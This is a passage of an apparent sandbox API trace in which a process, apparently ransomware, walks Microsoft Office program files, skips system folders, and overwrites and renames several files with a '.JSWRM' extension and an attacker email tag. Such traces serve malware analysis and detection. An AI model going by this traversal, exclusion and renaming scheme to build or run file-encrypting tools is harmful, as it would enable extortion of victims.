(lpString1="msproof7.dll", lpString2="msocache") returned 1 [0137.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msproof7.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msproof7.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msproof7.dll", lpUsedDefaultChar=0x0) returned 12 [0137.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msproof7.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msproof7.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msproof7.dll", lpUsedDefaultChar=0x0) returned 12 [0137.142] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca4703d4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca4703d4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb0f5967, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x214298, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPST32.DLL", cAlternateFileName="")) returned 1 [0137.142] lstrcmpiW (lpString1="MSPST32.DLL", lpString2=".") returned 1 [0137.142] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="..") returned 1 [0137.142] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="...") returned 1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="windows") returned -1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="recovery") returned -1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="perflogs") returned -1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="documents and settings") returned 1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="system volume information") returned -1 [0137.143] lstrcmpiW (lpString1="MSPST32.DLL", lpString2="msocache") returned 1 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPST32.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPST32.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPST32.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPST32.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPST32.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPST32.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.143] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc33c8ea0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd4f0ed48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd5124e28, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd02e48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPUB.EXE", cAlternateFileName="")) returned 1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2=".") returned 1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="..") returned 1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="...") returned 1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="windows") returned -1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="recovery") returned -1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="perflogs") returned -1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="documents and settings") returned 1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="system volume information") returned -1 [0137.143] lstrcmpiW (lpString1="MSPUB.EXE", lpString2="msocache") returned 1 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.EXE", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.EXE", lpUsedDefaultChar=0x0) returned 9 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.EXE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.EXE", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.EXE", lpUsedDefaultChar=0x0) returned 9 [0137.143] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3bb225, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc3bb225, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc6b6198, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x62b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="mspub.exe.manifest", cAlternateFileName="MSPUBE~1.MAN")) returned 1 [0137.143] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2=".") returned 1 [0137.143] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="..") returned 1 [0137.143] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="...") returned 1 [0137.143] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="windows") returned -1 [0137.143] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="recovery") returned -1 [0137.144] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="perflogs") returned -1 [0137.144] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="documents and settings") returned 1 [0137.144] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="$RECYCLE.BIN") returned 1 [0137.144] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="system volume information") returned -1 [0137.144] lstrcmpiW (lpString1="mspub.exe.manifest", lpString2="msocache") returned 1 [0137.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mspub.exe.manifest", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0137.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mspub.exe.manifest", cchWideChar=18, lpMultiByteStr=0x2413a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mspub.exe.manifest", lpUsedDefaultChar=0x0) returned 18 [0137.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mspub.exe.manifest", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0137.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mspub.exe.manifest", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mspub.exe.manifest", lpUsedDefaultChar=0x0) returned 18 [0137.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mspub.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.236] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1579) returned 1 [0137.236] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.236] ReadFile (in: hFile=0x45c, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345ec04*=0x620, lpOverlapped=0x0) returned 1 [0137.238] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.238] WriteFile (in: hFile=0x45c, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345ec00*=0x620, lpOverlapped=0x0) returned 1 [0137.238] CloseHandle (hObject=0x45c) returned 1 [0137.238] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mspub.exe.manifest" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.exe.manifest"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\mspub.exe.manifest.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.exe.manifest.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.240] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41874, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPUB.TLB", cAlternateFileName="")) returned 1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2=".") returned 1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="..") returned 1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="...") returned 1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="windows") returned -1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="recovery") returned -1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="perflogs") returned -1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="documents and settings") returned 1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="$RECYCLE.BIN") returned 1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="system volume information") returned -1 [0137.240] lstrcmpiW (lpString1="MSPUB.TLB", lpString2="msocache") returned 1 [0137.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.TLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.TLB", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.TLB", lpUsedDefaultChar=0x0) returned 9 [0137.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.TLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.TLB", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.TLB", lpUsedDefaultChar=0x0) returned 9 [0137.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPUB.TLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.241] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=268404) returned 1 [0137.241] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.241] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.252] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.252] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.253] CloseHandle (hObject=0x45c) returned 1 [0137.253] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPUB.TLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.tlb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPUB.TLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.254] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c66ecc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSPUB.VisualElementsManifest.xml", cAlternateFileName="MSPUBV~1.XML")) returned 1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2=".") returned 1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="..") returned 1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="...") returned 1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="windows") returned -1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0137.254] lstrcmpiW (lpString1="MSPUB.VisualElementsManifest.xml", lpString2="msocache") returned 1 [0137.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0137.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 32 [0137.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0137.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.VisualElementsManifest.xml", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 32 [0137.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPUB.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.256] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=338) returned 1 [0137.256] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.256] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0137.257] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.257] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0137.257] CloseHandle (hObject=0x45c) returned 1 [0137.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPUB.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSPUB.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mspub.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.258] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe1c8beb8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee37a832, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef39274d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xcea40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSQRY32.EXE", cAlternateFileName="")) returned 1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2=".") returned 1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="..") returned 1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="...") returned 1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="windows") returned -1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="recovery") returned -1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="perflogs") returned -1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="documents and settings") returned 1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="system volume information") returned -1 [0137.259] lstrcmpiW (lpString1="MSQRY32.EXE", lpString2="msocache") returned 1 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSQRY32.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSQRY32.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSQRY32.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.259] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdc8437, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x27230, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSRTEDIT.DLL", cAlternateFileName="")) returned 1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2=".") returned 1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="..") returned 1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="...") returned 1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="windows") returned -1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="recovery") returned -1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="perflogs") returned -1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="documents and settings") returned 1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="system volume information") returned -1 [0137.259] lstrcmpiW (lpString1="MSRTEDIT.DLL", lpString2="msocache") returned 1 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSRTEDIT.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSRTEDIT.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSRTEDIT.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSRTEDIT.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSRTEDIT.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSRTEDIT.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.259] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, 